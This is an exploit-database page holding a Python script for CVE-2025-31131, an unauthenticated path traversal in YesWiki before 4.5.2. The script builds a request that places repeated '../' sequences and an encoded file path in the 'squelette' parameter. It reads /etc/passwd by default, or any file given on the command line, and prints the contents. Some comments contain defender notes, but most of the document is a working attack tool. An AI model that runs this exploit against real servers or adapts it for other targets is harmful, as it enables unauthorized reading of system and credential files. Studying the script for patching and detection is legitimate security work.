## https://sploitus.com/exploit?id=PACKETSTORM:190286
# Exploit Title: YesWiki < 4.5.2 - Unauthenticated Path Traversal
    # Exploit Author: Al Baradi Joy
    # Exploit Date: April 6, 2025
    # CVE ID: CVE-2025-31131
    # Vendor Homepage: https://yeswiki.net/
    # Software Link: https://github.com/YesWiki/yeswiki
    # Affected Version: < 4.5.2
    # Tested On: YesWiki 4.5.1 on Ubuntu 22.04
    # Vulnerability Type: Unauthenticated Path Traversal (LFI)
    # CVSS Score: 8.6 (High)
    # CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    # Description:
    #   YesWiki before version 4.5.2 is vulnerable to unauthenticated path
    #   traversal via the 'squelette' parameter.
    #   A remote attacker can exploit this issue to read arbitrary files on the
    #   server, such as /etc/passwd.
    
    import requests
    import sys
    
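    def banner():
        """Print the tool banner: title and author credit between two 80-column rules."""
        rule = "=" * 80
        print(rule)
        # The title is a single string literal; the page's line wrap had split it
        # across two lines, which is a syntax error in Python.
        print(" YesWiki < 4.5.2 - Unauthenticated Path Traversal (CVE-2025-31131)")
        print(" Exploit Author: Al Baradi Joy")
        print(rule)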
    
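    def exploit(target, filename="/etc/passwd"):
        """Request one file through the 'squelette' parameter and print the outcome.

        Sends a single GET request to ``target`` in which the ``squelette`` query
        parameter is eight ``../`` segments followed by ``filename`` with its
        slashes replaced by ``%2f``, then reports whether the response looks like
        a passwd file.

        Args:
            target: Base URL of the YesWiki instance; ``http://`` is prepended
                when the value does not start with ``http``.
            filename: Absolute path of the file to request.

        Returns:
            None. All results are printed to stdout.

        Notes for defenders:
            * As built here, the request is a GET whose ``squelette`` value
              contains repeated ``../`` followed by ``%2f``-encoded path
              segments; that pattern is what to search for in access logs or
              match in a request filter.
            * The file header lists versions before 4.5.2 as affected, so
              upgrading to 4.5.2 or later is the remediation to verify.
            * Success is decided by the substring ``root:``, which only suits
              passwd-style files. A "failed" message for any other file is
              therefore not proof that the host is patched.
        """
        if not target.startswith("http"):
            target = "http://" + target

        traversal = "../" * 8
        encoded_file = filename.replace("/", "%2f")
        # Kept as one expression: the page's line wrap had left `payload =`
        # dangling on its own line, which does not parse.
        payload = (
            f"/?UrkCEO/edit&theme=margot&squelette={traversal}{encoded_file}&style=margot.css"
        )
        url = target.rstrip("/") + payload

        try:
            print(f"[+] Target: {target}")
            print(f"[+] Attempting to read: {filename}")
            response = requests.get(url, timeout=10)

            # Heuristic match only: HTTP 200 plus a passwd-style "root:" entry.
            if response.status_code == 200 and "root:" in response.text:
                print("[+] Exploit successful. File contents:\n")
                print(response.text)
            else:
                print("[!] Exploit failed or file not readable.")
                print(f"Status Code: {response.status_code}")
                # Short bodies are echoed to help tell an error page from a block.
                if len(response.text) < 200:
                    print(f"Response:\n{response.text}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")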
    
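    if __name__ == "__main__":
        # Command-line entry point: argv[1] is the base URL, argv[2] (optional)
        # is the file path to request, defaulting to /etc/passwd.
        banner()
        if len(sys.argv) < 2:
            print(f"Usage: python3 {sys.argv[0]} <target_url> [file_to_read]")
            # One literal again (the page wrap had split it, which does not parse).
            # The sample host uses the reserved .example TLD so the usage text
            # never names a real third-party site.
            print(f"Example: python3 {sys.argv[0]} http://wiki.example /etc/passwd")
            sys.exit(1)

        target_url = sys.argv[1]
        file_to_read = sys.argv[2] if len(sys.argv) > 2 else "/etc/passwd"
        exploit(target_url, file_to_read)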